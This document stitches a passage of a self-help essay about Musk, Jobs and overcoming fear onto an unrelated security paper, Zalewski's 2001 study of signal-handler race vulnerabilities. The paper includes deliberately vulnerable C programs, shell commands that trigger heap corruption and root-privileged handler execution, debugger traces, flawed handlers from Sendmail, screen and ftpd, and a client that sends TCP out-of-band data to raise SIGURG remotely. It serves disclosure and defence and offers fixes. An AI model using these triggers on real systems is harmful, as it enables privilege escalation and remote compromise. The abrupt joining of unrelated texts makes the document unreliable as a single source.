We talked about why scientists welcome negative feedback about their experiments. But when you are the experiment, negative feedback isn’t a piece of new, helpful information—it’s an insult. And it hurts. And it makes you mad. And because changing feels impossible, there’s not much good that feedback can do anyway—it’s like giving parents negative feedback on the name of their one-month-old child.
We discussed why scientists expect plenty of their experiments to fail. But when you and the experiment are one and the same, not only is taking on a new goal a change of identity, it’s putting your identity on the line. If the experiment fails, you fail. You are a failure. Devastating. Forever.
I talked to Musk about the United States and the way the forefathers reasoned by first principles when they started the country. He said he thought the reason they could do so is that they had a fresh slate to work with. The European countries of that era would have had a much harder time trying to do something like that—because, as he told me, they were “trapped in their own history.”
I’ve heard Musk use this same phrase to describe the big auto and aerospace companies of today. He sees Tesla and SpaceX like the late 18th century USA—fresh new labs ready for experiments—but when he looks at other companies in their industries, he sees an inability to drive their strategies from a clean slate mentality. Referring to the aerospace industry, Musk said, “There’s a tremendous bias against taking risks. Everyone is trying to optimize their ass-covering.”
Being trapped in your history means you don’t know how to change, you’ve forgotten how to innovate, and you’re stuck in the identity box the world has put you in. And you end up being the cancer researcher we mentioned who only tries likely-to-succeed experimentation within the comfort zone he knows best.
It’s for this reason that Steve Jobs looks back on his firing from Apple in 1985 as a blessing in disguise. He said: “Getting fired from Apple was the best thing that could have ever happened to me. The heaviness of being successful was replaced by the lightness of being a beginner again. It freed me to enter one of the most creative periods of my life.” Being fired “freed” Jobs from the shackles of his own history.
So what Self-Loathing Cook has to ask himself is: “Am I trapped in my own history?” As he stands on the cliff with his wings ready for action and finds himself paralyzed—from evolving as a person, from making changes in his life, from trying to do something bold or unusual—is the baggage of his own identity part of what’s holding him back?
Self-Loathing Cook’s beliefs about what’s scary aren’t any more real than Insecure Cook’s assumption that conventional wisdom has all the answers—but unlike the “Other people don’t know shit” epiphany, which you can observe evidence of all over the place, the epiphany that neither failing nor changing is actually a big deal can only be observed by experiencing it for yourself. Which you can only do after you overcome those fears…which only happens if you experience changing and failing and realize that nothing bad happens. Another catch-22.
These are the reasons I believe so many of the world’s most able people are stuck in life as Self-Loathing Cook, one epiphany short of the promised land.
The challenge with this last epiphany is to somehow figure out a way to lose respect for your own fear. That respect is in our wiring, and the only way to weaken it is by defying it and seeing, when nothing bad ends up happening, that most of the fear you’ve been feeling has just been a smoke and mirrors act. Doing something out of your comfort zone and having it turn out okay is an incredibly powerful experience, one that changes you—and each time you have that kind of experience, it chips away at your respect for your brain’s ingrained, irrational fears.
Because the most important thing the chef knows that the cooks don’t is that real life and Grand Theft Auto aren’t actually that different. Grand Theft Auto is a fun video game because it’s a fake world where you can do things with no fear. Drive 200mph on the highway. Break into a building. Run over a prostitute with your car. All good in GTA.
Unlike GTA, in real life, the law is a thing and jail is a thing. But that’s about where the differences end. If someone gave you a perfect simulation of today’s world to play in and told you that it’s all fake with no actual consequences—with the only rules being that you can’t break the law or harm anyone, and you still have to make sure to support your and your family’s basic needs—what would you do? My guess is that most people would do all kinds of things they’d love to do in their real life but wouldn’t dare to try, and that by behaving that way, they’d end up quickly getting a life going in the simulation that’s both far more successful and much truer to themselves than the real life they’re currently living. Removing the fear and the concern with identity or the opinions of others would thrust the person into the not-actually-risky Chef Lab and have them bouncing around all the exhilarating places outside their comfort zone—and their lives would take off. That’s the life irrational fears block us from.
When I look at the amazing chefs of our time, what’s clear is that they’re more or less treating real life as if it’s Grand Theft Life. And doing so gives them superpowers. That’s what I think Steve Jobs meant all the times he said, “Stay hungry. Stay foolish.”
And that’s what this third epiphany is about: fearlessness.
So if we want to think like a scientist more often in life, those are the three key objectives—to be humbler about what we know, more confident about what’s possible, and less afraid of things that don’t matter.
It’s a good plan—but also, ugh. Right? That’s a lot of stuff to try to do.
Usually at the end of a post like this, the major point seems manageable and concrete, and I finish writing it all excited to go be good at shit. But this post was like, “Here’s everything important and go do it.” So how do we work with that?
I think the key is to not try to be a perfect chef or expect that of yourself whatsoever. Because no one’s a perfect chef—not even Elon. And no one’s a pure cook either—nothing’s black and white when you’re talking about an animal species whose brains contain 86 billion neurons. The reality is that we’re all a little of both, and where we are on that spectrum varies in 100 ways, depending on the part of life in question, the stage we’re in of our evolution, and our mood that day.
If we want to improve ourselves and move our way closer to the chef side of the spectrum, we have to remember to remember. We have to remember that we have software, not just hardware. We have to remember that reasoning is a skill and like any skill, you get better at it if you work on it. And we have to remember the cook/chef distinction, so we can notice when we’re being like one or the other.
It’s fitting that this blog is called Wait But Why because the whole thing is a little like the adult version of the Why? game. After emerging from the blur of the arrogance of my early twenties, I began to realize that my software was full of a lot of unfounded certainty and blind assumptions and that I needed to spend some serious time deconstructing—which is the reason that every Wait But Why post, no matter what the topic, tends to start off with the question, “What’s really going on here?”
For me, that question is the springboard into all of this remembering to remember—it’s a hammer that shatters a brittle, protective feeling of certainty and forces me to do the hard work of building a more authentic, more useful set of thoughts about something. Or at least a better-embraced bewilderment.
And when I started learning about Musk in preparation to write these posts, it hit me that he wasn’t just doing awesome things in the world—he was a master at looking at the world, asking “What’s really going on here?” and seeing the real answer. That’s why his story resonated so hard with me and why I dedicated so much Wait But Why time to this series.
But also, Mars. Let’s all go, okay?
"Delivering Signals for Fun and Profit"
Understanding, exploiting and preventing signal-handling
related vulnerabilities.
Michal Zalewski <lcamtuf@razor.bindview.com>
(C) Copyright 2001 BindView Corporation
According to popular belief, writing signal handlers has little or nothing
to do with secure programming, as long as the handler code itself looks
good. At the same time, there have been discussions about which functions
may safely be invoked from handlers, and which functions must never, ever
be used there. Most Unix systems provide a standardized set of signal-safe
library calls, and a few systems - including OpenBSD and Solaris - document
them extensively:
http://www.openbsd.org/cgi-bin/man.cgi?query=sigaction:
"The following functions are either reentrant or not interruptible by sig-
nals and are async-signal safe. Therefore applications may invoke them,
without restriction, from signal-catching functions:
_exit(2), access(2), alarm(3), cfgetispeed(3), cfgetospeed(3),
cfsetispeed(3), cfsetospeed(3), chdir(2), chmod(2), chown(2),
close(2), creat(2), dup(2), dup2(2), execle(2), execve(2),
fcntl(2), fork(2), fpathconf(2), fstat(2), fsync(2), getegid(2),
geteuid(2), getgid(2), getgroups(2), getpgrp(2), getpid(2),
getppid(2), getuid(2), kill(2), link(2), lseek(2), mkdir(2),
mkfifo(2), open(2), pathconf(2), pause(2), pipe(2), raise(3),
read(2), rename(2), rmdir(2), setgid(2), setpgid(2), setsid(2),
setuid(2), sigaction(2), sigaddset(3), sigdelset(3),
sigemptyset(3), sigfillset(3), sigismember(3), signal(3),
sigpending(2), sigprocmask(2), sigsuspend(2), sleep(3), stat(2),
sysconf(3), tcdrain(3), tcflow(3), tcflush(3), tcgetattr(3),
tcgetpgrp(3), tcsendbreak(3), tcsetattr(3), tcsetpgrp(3), time(3),
times(3), umask(2), uname(3), unlink(2), utime(3), wait(2),
waitpid(2), write(2). sigpause(3), sigset(3).
All functions not in the above list are considered to be unsafe with
respect to signals. That is to say, the behaviour of such functions
when called from a signal handler is undefined. In general though,
signal handlers should do little more than set a flag; most other
actions are not safe."
Special care should be taken when performing any non-atomic operations
while signal delivery is not blocked, and signal handlers should not rely
on internal program state. Generally, whenever possible, a signal handler
should do little more than set a flag.
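Here is a minimal sketch of that 'just set a flag' pattern (illustrative
only, not taken from any program discussed in this paper): the handler only
writes a volatile sig_atomic_t variable, and the main loop performs the
actual, non-reentrant work in normal program context.

  #include <signal.h>
  #include <stdio.h>
  #include <unistd.h>

  static volatile sig_atomic_t got_hup = 0;

  static void on_hup(int sig) {
      (void)sig;
      got_hup = 1;               /* the only thing the handler does */
  }

  int main(void) {
      signal(SIGHUP, on_hup);
      for (;;) {
          if (got_hup) {
              got_hup = 0;
              /* non-reentrant work - syslog(), free(), etc. - is
                 safe here, outside of signal context */
              printf("SIGHUP received - reloading\n");
          }
          sleep(1);
      }
  }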
Unfortunately, until now there has been no known, practical demonstration
of the security impact of such bad coding practices. And although a signal
can be delivered at almost any point during the userspace execution of a
given program, most programmers never take enough care to avoid the
potential implications of this fact. Approximately 80 to 90% of the signal
handlers we have examined were written in an insecure manner.
This paper is an attempt to demonstrate and analyze the actual risks
caused by this kind of coding practice, and to discuss threat scenarios
that can be used by an attacker in order to escalate local privileges or,
sometimes, gain remote access to a machine. This class of vulnerabilities
affects numerous complex setuid programs (Sendmail, screen, pppd, etc.) and
several network daemons (ftpd, httpd and so on).
Thanks to Theo de Raadt for bringing this problem to my attention;
to Przemyslaw Frasunek for the discussion of remote attack possibilities;
to Dvorak, Chris Evans and Pekka Savola for their outstanding contributions
to the field of heap corruption attacks; and to Gregory Neil Shapiro and
Solar Designer for their comments on the issues discussed below. Additional
thanks to Mark Loveless, Dave Mann, Matt Power and other RAZOR team members
for their support and reviews.
Before we discuss more generalized attack scenarios, I would like to
explain signal handler races, starting with a very simple and clean example
in which we exploit a non-atomic signal handler. The following code
captures, in a simplified way, a very common bad coding practice (present,
for example, in the setuid root Sendmail program up to 8.11.3 and
8.12.0.Beta7):
  void sighndlr(int dummy) {
    syslog(LOG_NOTICE, user_dependent_data);
    // Initial cleanup code, calling the following somewhere:
    free(global_ptr2);
    free(global_ptr1);
    // (1) >> additional clean-up code - unlink tmp files, etc. <<
    exit(0);
  }

  // ...and at the beginning of the main code:

  signal(SIGHUP, sighndlr);
  signal(SIGTERM, sighndlr);

  // Other initialization routines, and global pointer assignment
  // somewhere in the code (we assume that nnn is partially
  // user-dependent, yyy does not have to be):

  global_ptr1 = malloc(nnn);
  global_ptr2 = malloc(yyy);

  // (2) >> further processing; the allocated memory <<
  //     >> is filled with any data, etc...          <<
This code seems pretty immune to any kind of security compromise. But that
is just an illusion. By delivering one of the signals handled by the
sighndlr() function somewhere in the middle of the main code's execution
(marked as (2) in the example above), the attacker causes execution to
reach the handler function. Let's assume we delivered SIGHUP. The syslog
message is written, the two pointers are freed, and some more clean-up is
done before exiting (1).
Now, by quickly delivering another signal - SIGTERM (note that the signal
already being handled is masked and will not be delivered again, so you
cannot deliver a second SIGHUP, but there is absolutely nothing to stop you
from delivering SIGTERM) - the attacker can cause the sighndlr() function
to be re-entered. This is a very common situation - 'shared' handlers are
declared for SIGQUIT, SIGTERM, SIGINT, and so on.
Now, for the purpose of this demonstration, we would like to target heap
structures by exploiting free() and syslog() behavior. It is very important
to understand how the [v]syslog() implementation works. We will focus on
the Linux glibc code - this function creates a temporary copy of the logged
message in a so-called memory-buffer stream, which is dynamically allocated
using two malloc() calls: the first one allocates the general stream
description structure, and the other one allocates the actual buffer that
will contain the logged message.
Please refer to the following URL for the vsyslog() function sources:
The stream management functions (open_memstream, etc.) can be found at:
In order for this particular attack to be successful, two conditions have
to be met:

  - the syslog() data must be user-dependent (as in Sendmail log messages
    describing transferred mail traffic),

  - the second of these two global memory blocks must be aligned in such a
    way that it will be re-used by the second open_memstream() malloc()
    call.

The second buffer (global_ptr2) is free()d during the first sighndlr()
call, so if these conditions are met, the second syslog() call will re-use
this memory and overwrite this area, including heap-management structures,
with the user-dependent syslog() buffer.
Of course, this situation is not limited to two global buffers -
generally, we need only one out of any number of free()d buffers to be
aligned that way. Additional possibilities include interrupting the free()
chain with precisely timed SIGTERM delivery and/or influencing buffer sizes
and heap data order by using different input data patterns.
If so, the attacker can cause the second free() pass to be called with a
pointer to user-dependent data (the syslog buffer), which leads to an
instant root compromise - see the excellent article by Chris Evans (based
on observations by Pekka Savola):

A practical discussion and exploit code for the vulnerability discussed in
the above article can be found here:

http://security-archive.merton.ox.ac.uk/bugtraq-200010/0084.html
Below is a sample 'vulnerable program' code:
--- vuln.c ---

#include <signal.h>
#include <syslog.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

void *global1, *global2;
char *what;

void sh(int dummy) {
  syslog(LOG_NOTICE, "%s\n", what);
  free(global2);
  free(global1);
  sleep(10);
  exit(0);
}

int main(int argc, char* argv[]) {
  what = argv[1];
  global1 = strdup(argv[2]);
  global2 = malloc(340);
  signal(SIGHUP, sh);
  signal(SIGTERM, sh);
  sleep(10);
  exit(0);
}

---- EOF ----
You can exploit it, forcing free() to be called on a memory region filled
with 0x41414141 (you can see this value in the registers at the time of the
crash -- the bytes represented as 41 in hex are set by the 'A' input
characters in the variable $LOG below). Sample command lines for a Bash
shell are:

$ gcc vuln.c -o vuln
$ PAD=`perl -e '{print "x"x410}'`
$ LOG=`perl -e '{print "A"x100}'`
$ ./vuln $LOG $PAD & sleep 1; killall -HUP vuln; sleep 1; killall -TERM vuln
The result should be a segmentation fault followed by a nice core dump
(for Linux glibc 2.1.9x and 2.0.7).
(gdb) back
#0 chunk_free (ar_ptr=0x4013dce0, p=0x80499a0) at malloc.c:3069
#1 0x4009b334 in libc_free (mem=0x80499a8) at malloc.c:3043
#2 0x80485b8 in sh ()
#4 0x400d5971 in __libc_nanosleep () from /lib/libc.so.6
#5 0x400d5801 in sleep (seconds=10) at ../sysdeps/unix/sysv/linux/sleep.c:85
#6 0x80485d6 in sh ()
So, as you can see, the failure occurred when the signal handler was
re-entered. The __libc_free function was called with a parameter of
0x080499a8, which points somewhere in the middle of our AAAs:
(gdb) x/s 0x80499a8
0x80499a8: 'A' <repeats 94 times>, "\n"
You can find 0x41414141 in the registers as well, showing that this data
is being processed. For more analysis, please refer to the paper mentioned
above.
For the description, impact and fix information for the Sendmail signal
handling vulnerability, please refer to the RAZOR advisory at:
http://razor.bindview.com/publish/advisories/adv_sm8120.html
Obviously, this is just one example of the attack. Whenever signal handler
execution is non-atomic, attacks of this kind are possible by re-entering
the handler while it is in the middle of performing non-reentrant
operations. Heap damage is the most obvious attack vector in this case,
but not the only one.
The attack described above usually requires specific conditions
to be met, and takes advantage of non-atomic signal handler execution,
which can be easily avoided by using additional flags or blocking
signal delivery.
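One common form of the 'additional flags' defense is a simple re-entry
guard in the cleanup handler itself. A minimal sketch (illustrative only,
not code from Sendmail or any other program discussed here):

  #include <signal.h>
  #include <stdlib.h>
  #include <unistd.h>

  static volatile sig_atomic_t cleaning_up = 0;

  void sighndlr(int dummy) {
      if (cleaning_up)     /* a second signal arrived while the handler */
          _exit(1);        /* was running - bail out, skip the cleanup  */
      cleaning_up = 1;
      /* ... the usual syslog() / free() / unlink() cleanup ... */
      exit(0);
  }

Note that this only stops the handler from being re-entered; it does
nothing about the attacks described next.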
But, since a signal can be delivered at any moment (unless explicitly
blocked), it is obvious that an attack can be performed without re-entering
the handler itself. It is enough to deliver a signal at an 'inappropriate'
moment. There are two attack schemes:
A) re-entering libc functions:

Every function that is not listed as reentrant-safe is a potential source
of vulnerabilities. Indeed, numerous library functions operate on global
variables and/or modify global state in a non-atomic way. Once again,
heap-management routines are probably the best example. By delivering a
signal while malloc(), free() or any other libcall of this kind is
executing, an attacker ensures that all subsequent calls to the heap
management routines made from the signal handler have unpredictable
effects, as the heap state is completely unpredictable from the
programmer's point of view. Other good examples are functions working on
static/global variables and buffers, such as certain implementations of
strtok(), inet_ntoa(), gethostbyname() and so on. In all cases, the
results will be unpredictable; the strtok() sketch below illustrates the
problem.
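As a small, self-contained illustration (the strings and signal choice are
made up for this sketch, not taken from any real daemon), consider
strtok(), which keeps its parsing position in a hidden static pointer
shared by the whole process:

  #include <signal.h>
  #include <stdio.h>
  #include <string.h>
  #include <unistd.h>

  static void on_hup(int sig) {
      (void)sig;
      /* unsafe: this strtok() call resets the library's hidden parser
         state, which main() is still relying on */
      char scratch[] = "completely unrelated text";
      strtok(scratch, " ");
  }

  int main(void) {
      char config[] = "user=alice;group=staff;shell=/bin/sh";
      signal(SIGHUP, on_hup);

      for (char *tok = strtok(config, ";"); tok; tok = strtok(NULL, ";")) {
          printf("%s\n", tok);
          sleep(1);          /* wide window for signal delivery */
      }
      /* if SIGHUP arrives inside the loop, the next strtok(NULL, ...)
         continues parsing the handler's long-gone local buffer - the
         output, and the program's behavior, become undefined */
      return 0;
  }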
B) interrupting non-atomic modifications:

This is basically the same problem, but outside library functions. For
example, the following code:

  dropped_privileges = 1;
  setuid(getuid());

is, technically speaking, using safe library functions only. But, at the
same time, it is possible to interrupt execution between the assignment
and the setuid() call, causing the signal handler to be executed with the
dropped_privileges flag set but superuser privileges not yet dropped. This
can very often be a source of serious problems.
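A sketch of the straightforward fix for this kind of window - block the
relevant signals around the non-atomic update, so the handler can never
observe the inconsistent state (the flag name and signal set are
assumptions based on the fragment above):

  #include <signal.h>
  #include <unistd.h>

  volatile sig_atomic_t dropped_privileges = 0;

  void drop_privileges_safely(void) {
      sigset_t block, old;

      sigemptyset(&block);
      sigaddset(&block, SIGHUP);
      sigaddset(&block, SIGTERM);

      sigprocmask(SIG_BLOCK, &block, &old);  /* handlers cannot run here */
      dropped_privileges = 1;
      setuid(getuid());
      sigprocmask(SIG_SETMASK, &old, NULL);  /* flag and uid now consistent */
  }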
First of all, we would like to come back to the Sendmail example to
demonstrate the potential consequences of re-entering libc. Note that the
signal handler is NOT re-entered - the signal is delivered only once:
#0 0x401705bc in chunk_free (ar_ptr=0x40212ce0, p=0x810f900) at malloc.c:3117
#1 0x4016fd12 in chunk_alloc (ar_ptr=0x40212ce0, nb=8200) at malloc.c:2601
#2 0x4016f7e6 in __libc_malloc (bytes=8192) at malloc.c:2703
#3 0x40168a27 in open_memstream (bufloc=0xbfff97bc, sizeloc=0xbfff97c0) at memstream.c:112
#4 0x401cf4fa in vsyslog (pri=6, fmt=0x80a5e03 "%s: %s", ap=0xbfff99ac) at syslog.c:142
#5 0x401cf447 in syslog (pri=6, fmt=0x80a5e03 "%s: %s") at syslog.c:102
#6 0x8055f64 in sm_syslog ()
#7 0x806793c in logsender ()
#8 0x8063902 in dropenvelope ()
#9 0x804e717 in finis ()
#10 0x804e9d8 in intsig () <---- SIGINT
#11 <signal handler called>
#12 chunk_alloc (ar_ptr=0x40212ce0, nb=4104) at malloc.c:2968
#13 0x4016f7e6 in __libc_malloc (bytes=4097) at malloc.c:2703
Heap corruption is caused by the interrupted malloc() call and, later, by
calling malloc() once again from the vsyslog() function invoked from the
handler.
Here are two other examples of very interesting stack corruption caused by
re-entering heap management routines in the Sendmail daemon - in both
cases, the signal was delivered only once:
A)
#0 0x401705bc in chunk_free (ar_ptr=0xdbdbdbdb, p=0x810b8e8) at malloc.c:3117
#1 0xdbdbdbdb in ?? ()
B)
/.../
#9 0x79f68510 in ?? ()
Cannot access memory at address 0xc483c689
We'd like to leave this one as an exercise for the reader - try to figure
out why this happens and why this problem can be exploitable. For now, we
would like to come back to our second scenario, interrupting non-atomic
code, to show that targeting the heap is not the only possibility.
Some programs temporarily return to the superuser UID in cleanup routines,
e.g., in order to unlink specific files. Very often, by entering the
handler at a given moment, it is possible to perform all of the cleanup's
file access operations with superuser privileges.
Here's an example of such coding, which can be found mainly in interactive
setuid software:
--- vuln2.c ---

#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void sh(int dummy) {
  printf("Running with uid=%d euid=%d\n", getuid(), geteuid());
}

int main(int argc, char* argv[]) {
  seteuid(getuid());
  setreuid(0, getuid());
  signal(SIGTERM, sh);
  sleep(5);
  // this is temporarily privileged code:
  seteuid(0);
  unlink("tmpfile");
  sleep(5);
  seteuid(getuid());
  exit(0);
}

---- EOF ----
$ ./vuln & sleep 3; killall -TERM vuln; sleep 3; killall -TERM vuln
Running with uid=500 euid=500
Running with uid=500 euid=0
Such a coding practice can be found, for example, in the 'screen' utility
developed by Oliver Laumann. One of the most obvious locations is the
CoreDump handler [screen.c]:
static sigret_t
CoreDump SIGDEFARG
{
  /.../
  setgid(getgid());
  setuid(getuid());
  unlink("core");
  /.../
SIGSEGV can be delivered in the middle of the user-initiated screen detach
routine, for example. To better understand what is going on and why, here's
strace output for the detach (Ctrl+A, D) command:
23534 geteuid() = 0
23534 geteuid() = 0
23534 getuid() = 500
23534 setreuid(0, 500) = 0   <-- HERE IT HAPPENS
23534 getegid() = 500
23534 chmod("/home/lcamtuf/.screen/23534.tty5.nimue", 0600) = 0
23534 utime("/home/lcamtuf/.screen/23534.tty5.nimue", NULL) = 0
23534 geteuid() = 500
23534 getuid() = 0
The marked line sets the real uid to zero. If SIGSEGV is delivered
somewhere near this point, the CoreDump() handler will run with superuser
privileges: its initial setuid(getuid()) call, which normally drops
privileges, now sets the uid to 0, because getuid() returns 0.
This is a very interesting issue, directly related to re-entering libc
functions and/or interrupting non-atomic code. Many complex daemons - ftp
servers, some http/proxy services, MTAs, etc. - have SIGURG handlers
declared, and very often these handlers are pretty verbose, calling
syslog() or freeing resources allocated for a specific connection. The
trick is that SIGURG, obviously, can be delivered over the network, using
a TCP/IP out-of-band (OOB) message. Thus, it is possible to perform such
attacks via the network layer without any privileges.
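For illustration, here is a minimal sketch of the remote trigger (the
address and port are placeholders): a client that sends a single byte of
TCP urgent data, which the peer's kernel turns into SIGURG for the process
that owns the connection - for instance an ftpd with the handler shown
below.

  #include <arpa/inet.h>
  #include <netinet/in.h>
  #include <string.h>
  #include <sys/socket.h>
  #include <unistd.h>

  int main(void) {
      struct sockaddr_in sin;
      int fd = socket(AF_INET, SOCK_STREAM, 0);

      memset(&sin, 0, sizeof(sin));
      sin.sin_family = AF_INET;
      sin.sin_port = htons(21);                        /* placeholder */
      inet_pton(AF_INET, "192.0.2.1", &sin.sin_addr);  /* placeholder */

      if (fd >= 0 && connect(fd, (struct sockaddr *)&sin, sizeof(sin)) == 0)
          send(fd, "!", 1, MSG_OOB);   /* urgent data -> SIGURG at the peer */

      close(fd);
      return 0;
  }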
Below is a SIGURG handler routine, which, with small modifications,
is shared both by BSD ftpd and WU-FTPD daemons:
static VOIDRET myoob FUNCTION((input), int input)
{
  /.../
  if (getline(cp, 7, stdin) == NULL) {
    reply(221, "You could at least say goodbye.");
    dologout(0);
  }
  /.../
}
As you can see, under certain conditions the dologout() function is
called. This routine looks like this:
dologout(int status)
{
  /.../
  if (logged_in) {
    delay_signaling();  /* we can't allow any signals while euid==0: kinch */
    (void) seteuid((uid_t) 0);
    wu_logwtmp(ttyline, "", "");
  }
  if (logging)
    syslog(LOG_INFO, "FTP session closed");
  /.../
}
As you can see, the authors took an additional precaution not to allow
signal delivery in the "logged_in" case. Unfortunately, syslog() is
a perfect example of a libc function that should NOT be called during
signal handling, regardless of whether "logged_in" or any other
special condition happens to be in effect.
As mentioned before, heap management functions such as malloc() are
called within syslog(), and these functions are not atomic. The OOB
message might arrive when the heap is in virtually any possible state.
Playing with uids / privileges / internal state is an option as well. The
main practical difficulty in all of these attacks is timing - the signal
has to arrive within a narrow window. In most cases this is a non-issue
for local attacks, as the attacker can control the execution environment
(e.g., the load average, the number of local files that the daemon needs
to access, etc.) and try a virtually unlimited number of times by invoking
the same program over and over again, increasing the chance of delivering
the signal at a given point. For remote attacks, the timing is a major
issue, but as long as the attack itself does not cause the service to stop
responding, thousands of attempts can be made.
Preventing these problems is a very complex and difficult task. There are
at least three aspects to it:

  - Using only reentrant-safe libcalls in signal handlers. This would
    require major rewrites of numerous programs. Another half-solution is
    to implement a wrapper around every insecure libcall used, with a
    special global flag checked to avoid re-entry.

  - Blocking signal delivery during all non-atomic operations and/or
    constructing signal handlers in a way that does not rely on internal
    program state (e.g., unconditionally setting a specific flag and
    nothing else).

  - Blocking signal delivery within signal handlers (a sketch follows).
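A sketch of the last point, using sigaction() so that the related signals
stay blocked for the duration of the handler, which prevents the handler
re-entry used in the first attack (sighndlr() stands for a cleanup handler
like the one in the earlier example; this is illustrative, not a complete
fix for the other issues above):

  #include <signal.h>
  #include <string.h>

  static void sighndlr(int sig) {
      (void)sig;
      /* cleanup as before; it can no longer be re-entered via
         SIGHUP/SIGTERM while it is running */
  }

  int install_handlers(void) {
      struct sigaction sa;

      memset(&sa, 0, sizeof(sa));
      sa.sa_handler = sighndlr;
      sigemptyset(&sa.sa_mask);
      sigaddset(&sa.sa_mask, SIGHUP);   /* both 'shared' signals remain   */
      sigaddset(&sa.sa_mask, SIGTERM);  /* blocked while the handler runs */
      sa.sa_flags = 0;

      if (sigaction(SIGHUP, &sa, NULL) < 0)
          return -1;
      if (sigaction(SIGTERM, &sa, NULL) < 0)
          return -1;
      return 0;
  }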
Michal Zalewski
<lcamtuf@razor.bindview.com>
16-17 May, 2001